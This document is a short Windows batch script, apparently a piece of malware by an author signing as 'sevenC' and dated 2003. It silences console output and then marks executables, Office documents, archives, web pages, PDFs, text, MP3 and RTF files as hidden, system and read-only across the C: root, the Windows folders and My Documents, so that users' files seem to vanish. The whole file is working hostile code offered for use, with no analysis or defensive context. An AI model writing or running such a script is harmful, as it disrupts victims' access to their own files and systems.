:: Bat.attrib.a-----------------
:: By sevenC--------------------
:: 1 Desember 2003--------------
:: No infecting-----------------
:: No Spreading-----------------
:: No deleting------------------
@ctty nul
@echo off
@for %%a in (C:\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.exe) do attrib +h +s +r %%a
@for %%a in (C:\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.doc) do attrib +h +s +r %%a
@for %%a in (C:\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.xls) do attrib +h +s +r %%a
@for %%a in (C:\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.ppt) do attrib +h +s +r %%a
@for %%a in (C:\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.zip) do attrib +h +s +r %%a
@for %%a in (C:\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.htm) do attrib +h +s +r %%a
@for %%a in (C:\*.html) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.html) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.html) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.html) do attrib +h +s +r %%a
@for %%a in (C:\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.txt) do attrib +h +s +r %%a
@for %%a in (C:\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.pdf) do attrib +h +s +r %%a
@for %%a in (C:\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.scr) do attrib +h +s +r %%a
@for %%a in (C:\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.mp3) do attrib +h +s +r %%a
@for %%a in (C:\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\windows\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\Mydocu~1\*.rtf) do attrib +h +s +r %%a
@for %%a in (C:\windows\system\*.rtf) do attrib +h +s +r %%a
:: Bat.attrib.a-----------------
:: By sevenC--------------------
:: 1 Desember 2003--------------
:: No infecting-----------------
:: No Spreading-----------------
:: No deleting------------------